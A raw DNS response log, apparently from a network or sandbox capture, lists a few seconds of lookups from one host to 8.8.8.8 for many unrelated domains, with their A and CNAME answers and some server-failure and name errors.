Mar 22, 2023 05:45:36.158301115 CET	8.8.8.8	192.168.2.5	0xdd21	No error (0)	metaforacom.com		185.42.105.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.164758921 CET	8.8.8.8	192.168.2.5	0x9fa7	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.212018013 CET	8.8.8.8	192.168.2.5	0xd2b2	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.233530045 CET	8.8.8.8	192.168.2.5	0x4479	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.234827995 CET	8.8.8.8	192.168.2.5	0xb4aa	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.252379894 CET	8.8.8.8	192.168.2.5	0xd361	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.297713041 CET	8.8.8.8	192.168.2.5	0x6860	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.311027050 CET	8.8.8.8	192.168.2.5	0xdd91	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.329556942 CET	8.8.8.8	192.168.2.5	0xe3a7	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.331501007 CET	8.8.8.8	192.168.2.5	0x5d4d	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.343579054 CET	8.8.8.8	192.168.2.5	0xbfa4	No error (0)	ramkome.com		62.75.216.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.354836941 CET	8.8.8.8	192.168.2.5	0x21ef	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.363183975 CET	8.8.8.8	192.168.2.5	0xb487	No error (0)	dhh.la.gov		52.200.51.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.368309975 CET	8.8.8.8	192.168.2.5	0x9761	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.371529102 CET	8.8.8.8	192.168.2.5	0x5bb9	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.384255886 CET	8.8.8.8	192.168.2.5	0xd1bb	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.463006020 CET	8.8.8.8	192.168.2.5	0x376d	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.463006020 CET	8.8.8.8	192.168.2.5	0x376d	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.496305943 CET	8.8.8.8	192.168.2.5	0x4db3	No error (0)	fundeo.com		104.24.160.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.496305943 CET	8.8.8.8	192.168.2.5	0x4db3	No error (0)	fundeo.com		172.67.97.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.496305943 CET	8.8.8.8	192.168.2.5	0x4db3	No error (0)	fundeo.com		104.24.161.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.508975029 CET	8.8.8.8	192.168.2.5	0xae3f	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.532031059 CET	8.8.8.8	192.168.2.5	0x4760	No error (0)	mackusick.de		217.160.0.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.561485052 CET	8.8.8.8	192.168.2.5	0xccaf	No error (0)	icd-host.com		192.252.159.165	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.561485052 CET	8.8.8.8	192.168.2.5	0xccaf	No error (0)	icd-host.com		192.252.159.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.561661959 CET	8.8.8.8	192.168.2.5	0x5422	No error (0)	likangds.com		23.225.40.19	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.564059019 CET	8.8.8.8	192.168.2.5	0xcb1f	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.631283045 CET	8.8.8.8	192.168.2.5	0x1b65	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.662611008 CET	8.8.8.8	192.168.2.5	0xa0c8	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.680901051 CET	8.8.8.8	192.168.2.5	0xa7ae	No error (0)	esmoke.net		204.15.134.44	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.696182013 CET	8.8.8.8	192.168.2.5	0x35f8	No error (0)	ldh.la.gov		75.2.95.235	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.716641903 CET	8.8.8.8	192.168.2.5	0xa842	No error (0)	indonesiamedia.com		74.208.215.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.729895115 CET	8.8.8.8	192.168.2.5	0x929a	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.729895115 CET	8.8.8.8	192.168.2.5	0x929a	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.729895115 CET	8.8.8.8	192.168.2.5	0x929a	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.729895115 CET	8.8.8.8	192.168.2.5	0x929a	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.730051041 CET	8.8.8.8	192.168.2.5	0x41f7	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.742399931 CET	8.8.8.8	192.168.2.5	0x2245	No error (0)	bggs.com		35.230.155.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.761162043 CET	8.8.8.8	192.168.2.5	0xd53c	No error (0)	xult.org		65.52.128.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.763674974 CET	8.8.8.8	192.168.2.5	0xb478	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.766395092 CET	8.8.8.8	192.168.2.5	0xd910	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.808809996 CET	8.8.8.8	192.168.2.5	0x19ca	No error (0)	strazynski.pl		85.128.196.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.809648037 CET	8.8.8.8	192.168.2.5	0xea55	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.823520899 CET	8.8.8.8	192.168.2.5	0xf771	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.832866907 CET	8.8.8.8	192.168.2.5	0xf7f3	No error (0)	wahw.com.au		54.194.190.151	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.844579935 CET	8.8.8.8	192.168.2.5	0xdcfe	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.855600119 CET	8.8.8.8	192.168.2.5	0x9a58	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.872385979 CET	8.8.8.8	192.168.2.5	0x79f6	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.890609980 CET	8.8.8.8	192.168.2.5	0x7cb2	No error (0)	hamaker.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.902745962 CET	8.8.8.8	192.168.2.5	0xf0e7	No error (0)	hyab.se		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.902745962 CET	8.8.8.8	192.168.2.5	0xf0e7	No error (0)	hyab.se		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.932804108 CET	8.8.8.8	192.168.2.5	0x364b	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.932804108 CET	8.8.8.8	192.168.2.5	0x364b	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.932804108 CET	8.8.8.8	192.168.2.5	0x364b	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.932804108 CET	8.8.8.8	192.168.2.5	0x364b	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.943810940 CET	8.8.8.8	192.168.2.5	0x5849	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.949584961 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	dspears.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.949584961 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:36.949584961 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.949584961 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.009269953 CET	8.8.8.8	192.168.2.5	0xab50	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.011774063 CET	8.8.8.8	192.168.2.5	0xd043	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.057780027 CET	8.8.8.8	192.168.2.5	0x7534	No error (0)	cnti.krsn.ru		217.74.161.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.098186016 CET	8.8.8.8	192.168.2.5	0xc494	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.110553980 CET	8.8.8.8	192.168.2.5	0xe210	No error (0)	diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.123347998 CET	8.8.8.8	192.168.2.5	0x24e7	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.131989956 CET	8.8.8.8	192.168.2.5	0x1dbb	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.199127913 CET	8.8.8.8	192.168.2.5	0xb769	No error (0)	muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.214881897 CET	8.8.8.8	192.168.2.5	0x4770	No error (0)	kevyt.net		172.67.129.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.214881897 CET	8.8.8.8	192.168.2.5	0x4770	No error (0)	kevyt.net		104.21.2.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.248368025 CET	8.8.8.8	192.168.2.5	0x2d60	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.248368025 CET	8.8.8.8	192.168.2.5	0x2d60	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.248368025 CET	8.8.8.8	192.168.2.5	0x2d60	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.248368025 CET	8.8.8.8	192.168.2.5	0x2d60	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.262671947 CET	8.8.8.8	192.168.2.5	0x8105	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.283441067 CET	8.8.8.8	192.168.2.5	0x4bfd	No error (0)	assideum.com		52.219.94.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.288820028 CET	8.8.8.8	192.168.2.5	0x6860	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.322211981 CET	8.8.8.8	192.168.2.5	0x4d2e	No error (0)	scip.org.uk		104.26.12.244	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.322211981 CET	8.8.8.8	192.168.2.5	0x4d2e	No error (0)	scip.org.uk		104.26.13.244	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.322211981 CET	8.8.8.8	192.168.2.5	0x4d2e	No error (0)	scip.org.uk		172.67.72.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.336937904 CET	8.8.8.8	192.168.2.5	0xcff8	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:37.336937904 CET	8.8.8.8	192.168.2.5	0xcff8	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.341886044 CET	8.8.8.8	192.168.2.5	0x72cc	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.344254017 CET	8.8.8.8	192.168.2.5	0xfa4e	No error (0)	www.diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.344300032 CET	8.8.8.8	192.168.2.5	0xa2f3	No error (0)	www.muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.347570896 CET	8.8.8.8	192.168.2.5	0x5d43	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.349078894 CET	8.8.8.8	192.168.2.5	0x6ea2	No error (0)	orlyhotel.com		104.21.48.207	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.349078894 CET	8.8.8.8	192.168.2.5	0x6ea2	No error (0)	orlyhotel.com		172.67.156.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.420197964 CET	8.8.8.8	192.168.2.5	0x599d	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.428214073 CET	8.8.8.8	192.168.2.5	0x9761	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.446342945 CET	8.8.8.8	192.168.2.5	0x6028	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.448199987 CET	8.8.8.8	192.168.2.5	0x4557	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.448373079 CET	8.8.8.8	192.168.2.5	0x4557	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.467479944 CET	8.8.8.8	192.168.2.5	0x609c	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.500926971 CET	8.8.8.8	192.168.2.5	0x3e51	No error (0)	gujarat.com		104.21.73.143	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.500926971 CET	8.8.8.8	192.168.2.5	0x3e51	No error (0)	gujarat.com		172.67.145.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.527034044 CET	8.8.8.8	192.168.2.5	0x55ee	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.579493046 CET	8.8.8.8	192.168.2.5	0x71f6	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.590153933 CET	8.8.8.8	192.168.2.5	0x23b0	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.607299089 CET	8.8.8.8	192.168.2.5	0x768f	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.607299089 CET	8.8.8.8	192.168.2.5	0x768f	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.611951113 CET	8.8.8.8	192.168.2.5	0x2917	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.614566088 CET	8.8.8.8	192.168.2.5	0xec36	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.614566088 CET	8.8.8.8	192.168.2.5	0xec36	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.624196053 CET	8.8.8.8	192.168.2.5	0x8191	No error (0)	magicomm.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.630359888 CET	8.8.8.8	192.168.2.5	0xdb6c	No error (0)	cnti.krsn.ru		217.74.161.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.681746960 CET	8.8.8.8	192.168.2.5	0x2481	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.681746960 CET	8.8.8.8	192.168.2.5	0x2481	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.735651970 CET	8.8.8.8	192.168.2.5	0x38e1	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.737749100 CET	8.8.8.8	192.168.2.5	0xb4cd	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.748769045 CET	8.8.8.8	192.168.2.5	0xa3e7	No error (0)	umcor.am		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.748769045 CET	8.8.8.8	192.168.2.5	0xa3e7	No error (0)	umcor.am		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.752034903 CET	8.8.8.8	192.168.2.5	0x28e9	No error (0)	dataform.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:37.931724072 CET	8.8.8.8	192.168.2.5	0xc93d	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.056904078 CET	8.8.8.8	192.168.2.5	0xc5ae	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.132767916 CET	8.8.8.8	192.168.2.5	0x542c	No error (0)	lyto.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.132767916 CET	8.8.8.8	192.168.2.5	0x542c	No error (0)	lyto.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.138879061 CET	8.8.8.8	192.168.2.5	0xced7	No error (0)	mjrcpas.com		154.81.136.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.158493042 CET	8.8.8.8	192.168.2.5	0xbf47	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.158493042 CET	8.8.8.8	192.168.2.5	0xbf47	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.158493042 CET	8.8.8.8	192.168.2.5	0xbf47	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.173939943 CET	8.8.8.8	192.168.2.5	0x7eca	No error (0)	fdlymca.org		192.124.249.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.275768995 CET	8.8.8.8	192.168.2.5	0xac93	No error (0)	603888.com	num6.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:38.275768995 CET	8.8.8.8	192.168.2.5	0xac93	No error (0)	num6.17986.net		67.21.93.229	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.302892923 CET	8.8.8.8	192.168.2.5	0xe7e9	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.302892923 CET	8.8.8.8	192.168.2.5	0xe7e9	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.306004047 CET	8.8.8.8	192.168.2.5	0x6860	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.312345028 CET	8.8.8.8	192.168.2.5	0x6892	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.319610119 CET	8.8.8.8	192.168.2.5	0xf4f3	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.413614988 CET	8.8.8.8	192.168.2.5	0xc5f6	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.459582090 CET	8.8.8.8	192.168.2.5	0x6028	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.478836060 CET	8.8.8.8	192.168.2.5	0x51fa	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.482903957 CET	8.8.8.8	192.168.2.5	0x609c	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.486758947 CET	8.8.8.8	192.168.2.5	0x5bb4	No error (0)	hyab.com		104.21.65.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.486758947 CET	8.8.8.8	192.168.2.5	0x5bb4	No error (0)	hyab.com		172.67.193.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.497313976 CET	8.8.8.8	192.168.2.5	0xaded	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.523623943 CET	8.8.8.8	192.168.2.5	0x2721	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.523710966 CET	8.8.8.8	192.168.2.5	0x80c8	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.556189060 CET	8.8.8.8	192.168.2.5	0x80c8	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.562942982 CET	8.8.8.8	192.168.2.5	0xd76b	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.661947966 CET	8.8.8.8	192.168.2.5	0x77e	No error (0)	bount.com.tw		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.661947966 CET	8.8.8.8	192.168.2.5	0x77e	No error (0)	bount.com.tw		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.704859972 CET	8.8.8.8	192.168.2.5	0xb892	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.742810965 CET	8.8.8.8	192.168.2.5	0xec1a	No error (0)	smtp.compuserve.com	east.us.smtp.aol.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:38.742810965 CET	8.8.8.8	192.168.2.5	0xec1a	No error (0)	east.us.smtp.aol.com	smtp.aol.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:38.742810965 CET	8.8.8.8	192.168.2.5	0xec1a	No error (0)	smtp.aol.com	smtp.cs.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:38.742810965 CET	8.8.8.8	192.168.2.5	0xec1a	No error (0)	smtp.cs.com	smtp.aol.g03.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:38.742810965 CET	8.8.8.8	192.168.2.5	0xec1a	No error (0)	smtp.aol.g03.yahoodns.net		87.248.97.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.743721008 CET	8.8.8.8	192.168.2.5	0x62fa	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.753053904 CET	8.8.8.8	192.168.2.5	0x28c1	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.753053904 CET	8.8.8.8	192.168.2.5	0x28c1	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.768963099 CET	8.8.8.8	192.168.2.5	0xc38	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.871331930 CET	8.8.8.8	192.168.2.5	0x9946	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.871391058 CET	8.8.8.8	192.168.2.5	0x960d	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.871391058 CET	8.8.8.8	192.168.2.5	0x960d	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.873143911 CET	8.8.8.8	192.168.2.5	0x1e2d	No error (0)	hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.873143911 CET	8.8.8.8	192.168.2.5	0x1e2d	No error (0)	hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.885445118 CET	8.8.8.8	192.168.2.5	0x484e	No error (0)	tcpoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:38.885445118 CET	8.8.8.8	192.168.2.5	0x484e	No error (0)	tcpoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.014132023 CET	8.8.8.8	192.168.2.5	0x5fdc	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.022779942 CET	8.8.8.8	192.168.2.5	0x6f25	No error (0)	flamingorecordings.com		35.214.171.193	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.065846920 CET	8.8.8.8	192.168.2.5	0xec7d	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.105403900 CET	8.8.8.8	192.168.2.5	0xffaf	No error (0)	uster.com		172.67.32.172	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.105403900 CET	8.8.8.8	192.168.2.5	0xffaf	No error (0)	uster.com		104.20.221.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.105403900 CET	8.8.8.8	192.168.2.5	0xffaf	No error (0)	uster.com		104.20.220.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.153692961 CET	8.8.8.8	192.168.2.5	0x82da	No error (0)	www.hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.153692961 CET	8.8.8.8	192.168.2.5	0x82da	No error (0)	www.hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.174066067 CET	8.8.8.8	192.168.2.5	0x93b0	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.176609039 CET	8.8.8.8	192.168.2.5	0x7629	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.249579906 CET	8.8.8.8	192.168.2.5	0xd8b5	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.346385002 CET	8.8.8.8	192.168.2.5	0xcc5a	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.427565098 CET	8.8.8.8	192.168.2.5	0xde2f	No error (0)	ossir.org		51.159.3.117	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.480680943 CET	8.8.8.8	192.168.2.5	0x483a	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.497023106 CET	8.8.8.8	192.168.2.5	0xaded	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.556117058 CET	8.8.8.8	192.168.2.5	0x3e63	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.594060898 CET	8.8.8.8	192.168.2.5	0x3e63	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
